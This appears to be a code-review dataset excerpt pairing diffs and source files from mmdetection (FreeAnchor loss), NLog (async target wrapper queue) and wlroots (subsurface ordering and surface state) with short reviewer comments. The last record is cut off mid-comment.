@HEADS.register_module()
class FreeAnchorRetinaHead(RetinaHead):
"""FreeAnchor RetinaHead used in https://arxiv.org/abs/1909.02466.
Args:
num_classes (int): Number of categories excluding the background
category.
in_channels (int): Number of channels in the input feature map.
stacked_convs (int): Number of conv layers in cls and reg tower.
Default: 4.
conv_cfg (dict): dictionary to construct and config conv layer.
Default: None.
norm_cfg (dict): dictionary to construct and config norm layer.
Default: norm_cfg=dict(type='GN', num_groups=32,
requires_grad=True).
        pre_anchor_topk (int): Number of boxes to be taken in each bag.
bbox_thr (float): The threshold of the saturated linear function. It is
            usually the same as the IoU threshold used in NMS.
gamma (float): Gamma parameter in focal loss.
alpha (float): Alpha parameter in focal loss.
""" # noqa: W605
def __init__(self,
num_classes,
in_channels,
stacked_convs=4,
conv_cfg=None,
norm_cfg=None,
pre_anchor_topk=50,
bbox_thr=0.6,
gamma=2.0,
alpha=0.5,
**kwargs):
super(FreeAnchorRetinaHead,
self).__init__(num_classes, in_channels, stacked_convs, conv_cfg,
norm_cfg, **kwargs)
self.pre_anchor_topk = pre_anchor_topk
self.bbox_thr = bbox_thr
self.gamma = gamma
self.alpha = alpha
def loss(self,
cls_scores,
bbox_preds,
gt_bboxes,
gt_labels,
img_metas,
gt_bboxes_ignore=None):
"""Compute losses of the head.
Args:
cls_scores (list[Tensor]): Box scores for each scale level
Has shape (N, num_anchors * num_classes, H, W)
bbox_preds (list[Tensor]): Box energies / deltas for each scale
level with shape (N, num_anchors * 4, H, W)
            gt_bboxes (list[Tensor]): each item holds the ground truth boxes for each
image in [tl_x, tl_y, br_x, br_y] format.
gt_labels (list[Tensor]): class indices corresponding to each box
img_metas (list[dict]): Meta information of each image, e.g.,
image size, scaling factor, etc.
gt_bboxes_ignore (None | list[Tensor]): specify which bounding
boxes can be ignored when computing the loss.
Returns:
dict[str, Tensor]: A dictionary of loss components.
"""
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
assert len(featmap_sizes) == len(self.anchor_generator.base_anchors)
anchor_list, _ = self.get_anchors(featmap_sizes, img_metas)
anchors = [torch.cat(anchor) for anchor in anchor_list]
# concatenate each level
cls_scores = [
cls.permute(0, 2, 3,
1).reshape(cls.size(0), -1, self.cls_out_channels)
for cls in cls_scores
]
bbox_preds = [
bbox_pred.permute(0, 2, 3, 1).reshape(bbox_pred.size(0), -1, 4)
for bbox_pred in bbox_preds
]
cls_scores = torch.cat(cls_scores, dim=1)
bbox_preds = torch.cat(bbox_preds, dim=1)
cls_prob = torch.sigmoid(cls_scores)
box_prob = []
num_pos = 0
positive_losses = []
for _, (anchors_, gt_labels_, gt_bboxes_, cls_prob_,
bbox_preds_) in enumerate(
zip(anchors, gt_labels, gt_bboxes, cls_prob, bbox_preds)):
with torch.no_grad():
if len(gt_bboxes_) == 0:
image_box_prob = torch.zeros(
anchors_.size(0),
self.cls_out_channels).type_as(bbox_preds_)
else:
# box_localization: a_{j}^{loc}, shape: [j, 4]
pred_boxes = self.bbox_coder.decode(anchors_, bbox_preds_)
# object_box_iou: IoU_{ij}^{loc}, shape: [i, j]
object_box_iou = bbox_overlaps(gt_bboxes_, pred_boxes)
# object_box_prob: P{a_{j} -> b_{i}}, shape: [i, j]
t1 = self.bbox_thr
t2 = object_box_iou.max(
dim=1, keepdim=True).values.clamp(min=t1 + 1e-12)
object_box_prob = ((object_box_iou - t1) /
(t2 - t1)).clamp(
min=0, max=1)
# object_cls_box_prob: P{a_{j} -> b_{i}}, shape: [i, c, j]
num_obj = gt_labels_.size(0)
indices = torch.stack([
torch.arange(num_obj).type_as(gt_labels_), gt_labels_
],
dim=0)
object_cls_box_prob = torch.sparse_coo_tensor(
indices, object_box_prob)
# image_box_iou: P{a_{j} \in A_{+}}, shape: [c, j]
"""
from "start" to "end" implement:
image_box_iou = torch.sparse.max(object_cls_box_prob,
dim=0).t()
"""
# start
box_cls_prob = torch.sparse.sum(
object_cls_box_prob, dim=0).to_dense()
indices = torch.nonzero(box_cls_prob, as_tuple=False).t_()
if indices.numel() == 0:
image_box_prob = torch.zeros(
anchors_.size(0),
self.cls_out_channels).type_as(object_box_prob)
else:
nonzero_box_prob = torch.where(
(gt_labels_.unsqueeze(dim=-1) == indices[0]),
object_box_prob[:, indices[1]],
torch.tensor([
0
]).type_as(object_box_prob)).max(dim=0).values
# upmap to shape [j, c]
image_box_prob = torch.sparse_coo_tensor(
indices.flip([0]),
nonzero_box_prob,
size=(anchors_.size(0),
self.cls_out_channels)).to_dense()
# end
box_prob.append(image_box_prob)
# construct bags for objects
match_quality_matrix = bbox_overlaps(gt_bboxes_, anchors_)
_, matched = torch.topk(
match_quality_matrix,
self.pre_anchor_topk,
dim=1,
sorted=False)
del match_quality_matrix
# matched_cls_prob: P_{ij}^{cls}
matched_cls_prob = torch.gather(
cls_prob_[matched], 2,
gt_labels_.view(-1, 1, 1).repeat(1, self.pre_anchor_topk,
1)).squeeze(2)
# matched_box_prob: P_{ij}^{loc}
matched_anchors = anchors_[matched]
matched_object_targets = self.bbox_coder.encode(
matched_anchors,
gt_bboxes_.unsqueeze(dim=1).expand_as(matched_anchors))
loss_bbox = self.loss_bbox(
bbox_preds_[matched],
matched_object_targets,
reduction_override='none').sum(-1)
matched_box_prob = torch.exp(-loss_bbox)
# positive_losses: {-log( Mean-max(P_{ij}^{cls} * P_{ij}^{loc}) )}
num_pos += len(gt_bboxes_)
positive_losses.append(
self.positive_bag_loss(matched_cls_prob, matched_box_prob))
positive_loss = torch.cat(positive_losses).sum() / max(1, num_pos)
# box_prob: P{a_{j} \in A_{+}}
box_prob = torch.stack(box_prob, dim=0)
# negative_loss:
# \sum_{j}{ FL((1 - P{a_{j} \in A_{+}}) * (1 - P_{j}^{bg})) } / n||B||
negative_loss = self.negative_bag_loss(cls_prob, box_prob).sum() / max(
1, num_pos * self.pre_anchor_topk)
# avoid the absence of gradients in regression subnet
# when no ground-truth in a batch
if num_pos == 0:
positive_loss = bbox_preds.sum() * 0
losses = {
'positive_bag_loss': positive_loss,
'negative_bag_loss': negative_loss
}
return losses
def positive_bag_loss(self, matched_cls_prob, matched_box_prob):
"""Compute positive bag loss.
:math:`-log( Mean-max(P_{ij}^{cls} * P_{ij}^{loc}) )`.
:math:`P_{ij}^{cls}`: matched_cls_prob, classification probability of matched samples.
:math:`P_{ij}^{loc}`: matched_box_prob, box probability of matched samples.
Args:
            matched_cls_prob (Tensor): Classification probability of matched
samples in shape (num_gt, pre_anchor_topk).
matched_box_prob (Tensor): BBox probability of matched samples,
in shape (num_gt, pre_anchor_topk).
Returns:
Tensor: Positive bag loss in shape (num_gt,).
""" # noqa: E501, W605
# bag_prob = Mean-max(matched_prob)
matched_prob = matched_cls_prob * matched_box_prob
weight = 1 / torch.clamp(1 - matched_prob, 1e-12, None)
weight /= weight.sum(dim=1).unsqueeze(dim=-1)
bag_prob = (weight * matched_prob).sum(dim=1)
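        # Note (explanatory, not in the original code): the weights are
        # proportional to 1 / (1 - matched_prob), so anchors whose combined
        # cls * loc probability is close to 1 dominate the weighted sum and
        # bag_prob behaves like a soft maximum over the bag ("Mean-max").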
# positive_bag_loss = -self.alpha * log(bag_prob)
return self.alpha * F.binary_cross_entropy(
bag_prob, torch.ones_like(bag_prob), reduction='none')
def negative_bag_loss(self, cls_prob, box_prob):
"""Compute negative bag loss.
:math:`FL((1 - P_{a_{j} \in A_{+}}) * (1 - P_{j}^{bg}))`.
        :math:`P_{a_{j} \in A_{+}}`: Box probability of matched samples.
:math:`P_{j}^{bg}`: Classification probability of negative samples.
Args:
cls_prob (Tensor): Classification probability, in shape
(num_img, num_anchors, num_classes).
box_prob (Tensor): Box probability, in shape
(num_img, num_anchors, num_classes).
Returns:
Tensor: Negative bag loss in shape (num_img, num_anchors, num_classes).
""" # noqa: E501, W605
prob = cls_prob * (1 - box_prob)
negative_bag_loss = prob**self.gamma * F.binary_cross_entropy(
prob, torch.zeros_like(prob), reduction='none')
return (1 - self.alpha) * negative_bag_loss
| 1 | 21,741 | Adding one line `prob = prob.clamp(min=EPS, max=1-EPS)` already works. | open-mmlab-mmdetection | py |
@@ -118,7 +118,15 @@ namespace NLog.Targets.Wrappers
/// <param name="overflowAction">The action to be taken when the queue overflows.</param>
public AsyncTargetWrapper(Target wrappedTarget, int queueLimit, AsyncTargetWrapperOverflowAction overflowAction)
{
- RequestQueue = new AsyncRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
+#if NETSTANDARD2_0
+ // NetStandard20 includes many optimizations for ConcurrentQueue:
+ // - See: https://blogs.msdn.microsoft.com/dotnet/2017/06/07/performance-improvements-in-net-core/
+            // Net40 ConcurrentQueue can seem to leak, because it doesn't clear properly on dequeue
+ // - See: https://blogs.msdn.microsoft.com/pfxteam/2012/05/08/concurrentqueuet-holding-on-to-a-few-dequeued-elements/
+ _requestQueue = new ConcurrentRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
+#else
+ _requestQueue = new AsyncRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
+#endif
TimeToSleepBetweenBatches = 50;
BatchSize = 200;
FullBatchSizeWriteLimit = 5; | 1 | //
// Copyright (c) 2004-2018 Jaroslaw Kowalski <[email protected]>, Kim Christensen, Julian Verdurmen
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of Jaroslaw Kowalski nor the names of its
// contributors may be used to endorse or promote products derived from this
// software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
// THE POSSIBILITY OF SUCH DAMAGE.
//
namespace NLog.Targets.Wrappers
{
using System;
using System.ComponentModel;
using System.Threading;
using NLog.Common;
using NLog.Internal;
/// <summary>
/// Provides asynchronous, buffered execution of target writes.
/// </summary>
/// <seealso href="https://github.com/nlog/nlog/wiki/AsyncWrapper-target">Documentation on NLog Wiki</seealso>
/// <remarks>
/// <p>
/// Asynchronous target wrapper allows the logger code to execute more quickly, by queueing
/// messages and processing them in a separate thread. You should wrap targets
    /// that spend a non-trivial amount of time in their Write() method with an asynchronous
    /// target to speed up logging.
/// </p>
/// <p>
/// Because asynchronous logging is quite a common scenario, NLog supports a
/// shorthand notation for wrapping all targets with AsyncWrapper. Just add async="true" to
/// the <targets/> element in the configuration file.
/// </p>
/// <code lang="XML">
/// <![CDATA[
/// <targets async="true">
/// ... your targets go here ...
/// </targets>
/// ]]></code>
/// </remarks>
/// <example>
/// <p>
/// To set up the target in the <a href="config.html">configuration file</a>,
/// use the following syntax:
/// </p>
/// <code lang="XML" source="examples/targets/Configuration File/AsyncWrapper/NLog.config" />
/// <p>
/// The above examples assume just one target and a single rule. See below for
/// a programmatic configuration that's equivalent to the above config file:
/// </p>
/// <code lang="C#" source="examples/targets/Configuration API/AsyncWrapper/Wrapping File/Example.cs" />
/// </example>
[Target("AsyncWrapper", IsWrapper = true)]
public class AsyncTargetWrapper : WrapperTargetBase
{
private readonly object _writeLockObject = new object();
private readonly object _timerLockObject = new object();
private Timer _lazyWriterTimer;
private readonly ReusableAsyncLogEventList _reusableAsyncLogEventList = new ReusableAsyncLogEventList(200);
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
public AsyncTargetWrapper()
: this(null)
{
}
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
/// <param name="name">Name of the target.</param>
/// <param name="wrappedTarget">The wrapped target.</param>
public AsyncTargetWrapper(string name, Target wrappedTarget)
: this(wrappedTarget)
{
Name = name;
}
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
/// <param name="wrappedTarget">The wrapped target.</param>
public AsyncTargetWrapper(Target wrappedTarget)
: this(wrappedTarget, 10000, AsyncTargetWrapperOverflowAction.Discard)
{
}
/// <summary>
/// Initializes a new instance of the <see cref="AsyncTargetWrapper" /> class.
/// </summary>
/// <param name="wrappedTarget">The wrapped target.</param>
/// <param name="queueLimit">Maximum number of requests in the queue.</param>
/// <param name="overflowAction">The action to be taken when the queue overflows.</param>
public AsyncTargetWrapper(Target wrappedTarget, int queueLimit, AsyncTargetWrapperOverflowAction overflowAction)
{
RequestQueue = new AsyncRequestQueue(10000, AsyncTargetWrapperOverflowAction.Discard);
TimeToSleepBetweenBatches = 50;
BatchSize = 200;
FullBatchSizeWriteLimit = 5;
WrappedTarget = wrappedTarget;
QueueLimit = queueLimit;
OverflowAction = overflowAction;
}
/// <summary>
/// Gets or sets the number of log events that should be processed in a batch
/// by the lazy writer thread.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(200)]
public int BatchSize { get; set; }
/// <summary>
/// Gets or sets the time in milliseconds to sleep between batches.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(50)]
public int TimeToSleepBetweenBatches { get; set; }
/// <summary>
/// Gets or sets the action to be taken when the lazy writer thread request queue count
/// exceeds the set limit.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue("Discard")]
public AsyncTargetWrapperOverflowAction OverflowAction
{
get => RequestQueue.OnOverflow;
set => RequestQueue.OnOverflow = value;
}
/// <summary>
/// Gets or sets the limit on the number of requests in the lazy writer thread request queue.
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(10000)]
public int QueueLimit
{
get => RequestQueue.RequestLimit;
set => RequestQueue.RequestLimit = value;
}
/// <summary>
/// Gets or sets the limit of full <see cref="BatchSize"/>s to write before yielding into <see cref="TimeToSleepBetweenBatches"/>
/// Performance is better when writing many small batches, than writing a single large batch
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(5)]
public int FullBatchSizeWriteLimit { get; set; }
/// <summary>
/// Gets the queue of lazy writer thread requests.
/// </summary>
internal AsyncRequestQueue RequestQueue { get; private set; }
/// <summary>
/// Schedules a flush of pending events in the queue (if any), followed by flushing the WrappedTarget.
/// </summary>
/// <param name="asyncContinuation">The asynchronous continuation.</param>
protected override void FlushAsync(AsyncContinuation asyncContinuation)
{
if (_flushEventsInQueueDelegate == null)
_flushEventsInQueueDelegate = FlushEventsInQueue;
AsyncHelpers.StartAsyncTask(_flushEventsInQueueDelegate, asyncContinuation);
}
private Action<object> _flushEventsInQueueDelegate;
/// <summary>
/// Initializes the target by starting the lazy writer timer.
/// </summary>
protected override void InitializeTarget()
{
base.InitializeTarget();
if (!OptimizeBufferReuse && WrappedTarget != null && WrappedTarget.OptimizeBufferReuse)
OptimizeBufferReuse = GetType() == typeof(AsyncTargetWrapper); // Class not sealed, reduce breaking changes
RequestQueue.Clear();
InternalLogger.Trace("AsyncWrapper(Name={0}): Start Timer", Name);
_lazyWriterTimer = new Timer(ProcessPendingEvents, null, Timeout.Infinite, Timeout.Infinite);
StartLazyWriterTimer();
}
/// <summary>
/// Shuts down the lazy writer timer.
/// </summary>
protected override void CloseTarget()
{
StopLazyWriterThread();
if (Monitor.TryEnter(_writeLockObject, 500))
{
try
{
WriteEventsInQueue(int.MaxValue, "Closing Target");
}
finally
{
Monitor.Exit(_writeLockObject);
}
}
base.CloseTarget();
}
/// <summary>
/// Starts the lazy writer thread which periodically writes
/// queued log messages.
/// </summary>
protected virtual void StartLazyWriterTimer()
{
lock (_timerLockObject)
{
if (_lazyWriterTimer != null)
{
if (TimeToSleepBetweenBatches <= 0)
{
InternalLogger.Trace("AsyncWrapper(Name={0}): Throttled timer scheduled", Name);
_lazyWriterTimer.Change(1, Timeout.Infinite);
}
else
{
_lazyWriterTimer.Change(TimeToSleepBetweenBatches, Timeout.Infinite);
}
}
}
}
/// <summary>
/// Attempts to start an instant timer-worker-thread which can write
/// queued log messages.
/// </summary>
/// <returns>Returns true when scheduled a timer-worker-thread</returns>
protected virtual bool StartInstantWriterTimer()
{
bool lockTaken = false;
try
{
lockTaken = Monitor.TryEnter(_writeLockObject);
if (lockTaken)
{
// Lock taken means no timer-worker-thread is active writing, schedule timer now
lock (_timerLockObject)
{
if (_lazyWriterTimer != null)
{
                            // Not optimal to schedule timer-worker-thread while holding lock,
// as the newly scheduled timer-worker-thread will hammer into the writeLockObject
_lazyWriterTimer.Change(0, Timeout.Infinite);
return true;
}
}
}
return false;
}
finally
{
// If not able to take lock, then it means timer-worker-thread is already active,
// and timer-worker-thread will check RequestQueue after leaving writeLockObject
if (lockTaken)
Monitor.Exit(_writeLockObject);
}
}
/// <summary>
/// Stops the lazy writer thread.
/// </summary>
protected virtual void StopLazyWriterThread()
{
lock (_timerLockObject)
{
var currentTimer = _lazyWriterTimer;
if (currentTimer != null)
{
_lazyWriterTimer = null;
currentTimer.WaitForDispose(TimeSpan.FromSeconds(1));
}
}
}
/// <summary>
/// Adds the log event to asynchronous queue to be processed by
/// the lazy writer thread.
/// </summary>
/// <param name="logEvent">The log event.</param>
/// <remarks>
/// The <see cref="Target.PrecalculateVolatileLayouts"/> is called
/// to ensure that the log event can be processed in another thread.
/// </remarks>
protected override void Write(AsyncLogEventInfo logEvent)
{
MergeEventProperties(logEvent.LogEvent);
PrecalculateVolatileLayouts(logEvent.LogEvent);
bool queueWasEmpty = RequestQueue.Enqueue(logEvent);
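            // In non-throttled mode (TimeToSleepBetweenBatches <= 0), schedule a
            // timer-worker-thread right away when the queue was empty before this event.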
if (queueWasEmpty && TimeToSleepBetweenBatches <= 0)
StartInstantWriterTimer();
}
/// <summary>
/// Write to queue without locking <see cref="Target.SyncRoot"/>
/// </summary>
/// <param name="logEvent"></param>
protected override void WriteAsyncThreadSafe(AsyncLogEventInfo logEvent)
{
try
{
Write(logEvent);
}
catch (Exception exception)
{
if (exception.MustBeRethrown())
{
throw;
}
logEvent.Continuation(exception);
}
}
private void ProcessPendingEvents(object state)
{
if (_lazyWriterTimer == null)
return;
bool wroteFullBatchSize = false;
try
{
lock (_writeLockObject)
{
int count = WriteEventsInQueue(BatchSize, "Timer");
if (count == BatchSize)
wroteFullBatchSize = true;
if (wroteFullBatchSize && TimeToSleepBetweenBatches <= 0)
StartInstantWriterTimer(); // Found full batch, fast schedule to take next batch (within lock to avoid pile up)
}
}
catch (Exception exception)
{
wroteFullBatchSize = false; // Something went wrong, lets throttle retry
InternalLogger.Error(exception, "AsyncWrapper(Name={0}): Error in lazy writer timer procedure.", Name);
if (exception.MustBeRethrownImmediately())
{
throw; // Throwing exceptions here will crash the entire application (.NET 2.0 behavior)
}
}
finally
{
if (TimeToSleepBetweenBatches <= 0)
{
// If queue was not empty, then more might have arrived while writing the first batch
// Uses throttled timer here, so we can process in batches (faster)
if (!wroteFullBatchSize && RequestQueue.RequestCount > 0)
StartLazyWriterTimer(); // Queue was checked as empty, but now we have more
}
else
{
StartLazyWriterTimer();
}
}
}
private void FlushEventsInQueue(object state)
{
try
{
var asyncContinuation = state as AsyncContinuation;
lock (_writeLockObject)
{
WriteEventsInQueue(int.MaxValue, "Flush Async");
if (asyncContinuation != null)
base.FlushAsync(asyncContinuation);
}
if (TimeToSleepBetweenBatches <= 0 && RequestQueue.RequestCount > 0)
StartLazyWriterTimer(); // Queue was checked as empty, but now we have more
}
catch (Exception exception)
{
InternalLogger.Error(exception, "AsyncWrapper(Name={0}): Error in flush procedure.", Name);
if (exception.MustBeRethrownImmediately())
{
throw; // Throwing exceptions here will crash the entire application (.NET 2.0 behavior)
}
}
}
private int WriteEventsInQueue(int batchSize, string reason)
{
if (WrappedTarget == null)
{
InternalLogger.Error("AsyncWrapper(Name={0}): WrappedTarget is NULL", Name);
return 0;
}
int count = 0;
for (int i = 0; i < FullBatchSizeWriteLimit; ++i)
{
if (!OptimizeBufferReuse || batchSize == int.MaxValue)
{
var logEvents = RequestQueue.DequeueBatch(batchSize);
if (logEvents.Length > 0)
{
if (reason != null)
InternalLogger.Trace("AsyncWrapper(Name={0}): Writing {1} events ({2})", Name, logEvents.Length, reason);
WrappedTarget.WriteAsyncLogEvents(logEvents);
}
count = logEvents.Length;
}
else
{
using (var targetList = _reusableAsyncLogEventList.Allocate())
{
var logEvents = targetList.Result;
RequestQueue.DequeueBatch(batchSize, logEvents);
if (logEvents.Count > 0)
{
if (reason != null)
InternalLogger.Trace("AsyncWrapper(Name={0}): Writing {1} events ({2})", Name, logEvents.Count, reason);
WrappedTarget.WriteAsyncLogEvents(logEvents);
}
count = logEvents.Count;
}
}
if (count < batchSize)
break;
}
return count;
}
}
} | 1 | 16,976 | another option would be to create a `CreateRequestQueue(bool lockingQeueue)`, and set it only in `InitializeTarget`, isn't? The would prefer having the creation and "business" rules for the creation in one region, I think `InitializeTarget` would be the best place. | NLog-NLog | .cs |
@@ -805,7 +805,7 @@ static void subsurface_handle_place_above(struct wl_client *client,
}
wl_list_remove(&subsurface->parent_pending_link);
- wl_list_insert(sibling->parent_pending_link.prev,
+ wl_list_insert(&sibling->parent_pending_link,
&subsurface->parent_pending_link);
subsurface->reordered = true; | 1 | #include <assert.h>
#include <stdlib.h>
#include <wayland-server.h>
#include <wlr/render/egl.h>
#include <wlr/render/interface.h>
#include <wlr/types/wlr_compositor.h>
#include <wlr/types/wlr_linux_dmabuf.h>
#include <wlr/types/wlr_matrix.h>
#include <wlr/types/wlr_region.h>
#include <wlr/types/wlr_surface.h>
#include <wlr/util/log.h>
#include <wlr/util/region.h>
#include "util/signal.h"
#define CALLBACK_VERSION 1
#define SURFACE_VERSION 4
#define SUBSURFACE_VERSION 1
static int min(int fst, int snd) {
if (fst < snd) {
return fst;
} else {
return snd;
}
}
static int max(int fst, int snd) {
if (fst > snd) {
return fst;
} else {
return snd;
}
}
static void surface_state_reset_buffer(struct wlr_surface_state *state) {
if (state->buffer) {
wl_list_remove(&state->buffer_destroy_listener.link);
state->buffer = NULL;
}
}
static void surface_handle_buffer_destroy(struct wl_listener *listener,
void *data) {
struct wlr_surface_state *state =
wl_container_of(listener, state, buffer_destroy_listener);
surface_state_reset_buffer(state);
}
static void surface_state_release_buffer(struct wlr_surface_state *state) {
if (state->buffer) {
wl_buffer_send_release(state->buffer);
surface_state_reset_buffer(state);
}
}
static void surface_state_set_buffer(struct wlr_surface_state *state,
struct wl_resource *buffer) {
surface_state_reset_buffer(state);
state->buffer = buffer;
if (buffer) {
wl_resource_add_destroy_listener(buffer,
&state->buffer_destroy_listener);
state->buffer_destroy_listener.notify = surface_handle_buffer_destroy;
}
}
static void surface_destroy(struct wl_client *client,
struct wl_resource *resource) {
wl_resource_destroy(resource);
}
static void surface_attach(struct wl_client *client,
struct wl_resource *resource,
struct wl_resource *buffer, int32_t sx, int32_t sy) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_BUFFER;
surface->pending->sx = sx;
surface->pending->sy = sy;
surface_state_set_buffer(surface->pending, buffer);
}
static void surface_damage(struct wl_client *client,
struct wl_resource *resource,
int32_t x, int32_t y, int32_t width, int32_t height) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if (width < 0 || height < 0) {
return;
}
surface->pending->invalid |= WLR_SURFACE_INVALID_SURFACE_DAMAGE;
pixman_region32_union_rect(&surface->pending->surface_damage,
&surface->pending->surface_damage,
x, y, width, height);
}
static struct wlr_frame_callback *frame_callback_from_resource(
struct wl_resource *resource) {
assert(wl_resource_instance_of(resource, &wl_callback_interface, NULL));
return wl_resource_get_user_data(resource);
}
static void callback_handle_resource_destroy(struct wl_resource *resource) {
struct wlr_frame_callback *cb = frame_callback_from_resource(resource);
wl_list_remove(&cb->link);
free(cb);
}
static void surface_frame(struct wl_client *client,
struct wl_resource *resource, uint32_t callback) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
struct wlr_frame_callback *cb =
calloc(1, sizeof(struct wlr_frame_callback));
if (cb == NULL) {
wl_resource_post_no_memory(resource);
return;
}
cb->resource = wl_resource_create(client, &wl_callback_interface,
CALLBACK_VERSION, callback);
if (cb->resource == NULL) {
free(cb);
wl_resource_post_no_memory(resource);
return;
}
wl_resource_set_implementation(cb->resource, NULL, cb,
callback_handle_resource_destroy);
wl_list_insert(surface->pending->frame_callback_list.prev, &cb->link);
surface->pending->invalid |= WLR_SURFACE_INVALID_FRAME_CALLBACK_LIST;
}
static void surface_set_opaque_region(struct wl_client *client,
struct wl_resource *resource,
struct wl_resource *region_resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if ((surface->pending->invalid & WLR_SURFACE_INVALID_OPAQUE_REGION)) {
pixman_region32_clear(&surface->pending->opaque);
}
surface->pending->invalid |= WLR_SURFACE_INVALID_OPAQUE_REGION;
if (region_resource) {
pixman_region32_t *region = wlr_region_from_resource(region_resource);
pixman_region32_copy(&surface->pending->opaque, region);
} else {
pixman_region32_clear(&surface->pending->opaque);
}
}
static void surface_set_input_region(struct wl_client *client,
struct wl_resource *resource, struct wl_resource *region_resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_INPUT_REGION;
if (region_resource) {
pixman_region32_t *region = wlr_region_from_resource(region_resource);
pixman_region32_copy(&surface->pending->input, region);
} else {
pixman_region32_fini(&surface->pending->input);
pixman_region32_init_rect(&surface->pending->input,
INT32_MIN, INT32_MIN, UINT32_MAX, UINT32_MAX);
}
}
static bool surface_update_size(struct wlr_surface *surface,
struct wlr_surface_state *state) {
if (!state->buffer) {
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, state->width, state->height);
state->height = 0;
state->width = 0;
return true;
}
int scale = state->scale;
enum wl_output_transform transform = state->transform;
struct wl_shm_buffer *buf = wl_shm_buffer_get(state->buffer);
if (buf != NULL) {
state->buffer_width = wl_shm_buffer_get_width(buf);
state->buffer_height = wl_shm_buffer_get_height(buf);
} else if (wlr_renderer_resource_is_wl_drm_buffer(surface->renderer,
state->buffer)) {
wlr_renderer_wl_drm_buffer_get_size(surface->renderer, state->buffer,
&state->buffer_width, &state->buffer_height);
} else if (wlr_dmabuf_resource_is_buffer(state->buffer)) {
struct wlr_dmabuf_buffer *dmabuf =
wlr_dmabuf_buffer_from_buffer_resource(state->buffer);
state->buffer_width = dmabuf->attributes.width;
state->buffer_height = dmabuf->attributes.height;
} else {
wlr_log(L_ERROR, "Unknown buffer handle attached");
state->buffer_width = 0;
state->buffer_height = 0;
}
int width = state->buffer_width / scale;
int height = state->buffer_height / scale;
if (transform == WL_OUTPUT_TRANSFORM_90 ||
transform == WL_OUTPUT_TRANSFORM_270 ||
transform == WL_OUTPUT_TRANSFORM_FLIPPED_90 ||
transform == WL_OUTPUT_TRANSFORM_FLIPPED_270) {
int tmp = width;
width = height;
height = tmp;
}
bool update_damage = false;
if (width != state->width || height != state->height) {
// Damage the whole surface on resize
// This isn't in the spec, but Weston does it and QT expects it
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, state->width, state->height);
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, width, height);
update_damage = true;
}
state->width = width;
state->height = height;
return update_damage;
}
/**
* Append pending state to current state and clear pending state.
*/
static void surface_move_state(struct wlr_surface *surface,
struct wlr_surface_state *next, struct wlr_surface_state *state) {
bool update_damage = false;
bool update_size = false;
int oldw = state->width;
int oldh = state->height;
if ((next->invalid & WLR_SURFACE_INVALID_SCALE)) {
state->scale = next->scale;
update_size = true;
}
if ((next->invalid & WLR_SURFACE_INVALID_TRANSFORM)) {
state->transform = next->transform;
update_size = true;
}
if ((next->invalid & WLR_SURFACE_INVALID_BUFFER)) {
surface_state_release_buffer(state);
surface_state_set_buffer(state, next->buffer);
surface_state_reset_buffer(next);
state->sx = next->sx;
state->sy = next->sy;
update_size = true;
}
if (update_size) {
update_damage = surface_update_size(surface, state);
}
if ((next->invalid & WLR_SURFACE_INVALID_SURFACE_DAMAGE)) {
pixman_region32_intersect_rect(&next->surface_damage,
&next->surface_damage, 0, 0, state->width, state->height);
pixman_region32_union(&state->surface_damage, &state->surface_damage,
&next->surface_damage);
pixman_region32_clear(&next->surface_damage);
update_damage = true;
}
if ((next->invalid & WLR_SURFACE_INVALID_BUFFER_DAMAGE)) {
pixman_region32_intersect_rect(&next->buffer_damage,
&next->buffer_damage, 0, 0, state->buffer_width,
state->buffer_height);
pixman_region32_union(&state->buffer_damage, &state->buffer_damage,
&next->buffer_damage);
pixman_region32_clear(&next->buffer_damage);
update_damage = true;
}
if (update_damage) {
pixman_region32_t buffer_damage, surface_damage;
pixman_region32_init(&buffer_damage);
pixman_region32_init(&surface_damage);
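		// Keep the two accumulated regions consistent: convert surface damage
		// into buffer coordinates and buffer damage into surface coordinates,
		// then union each result back in, so that either region alone
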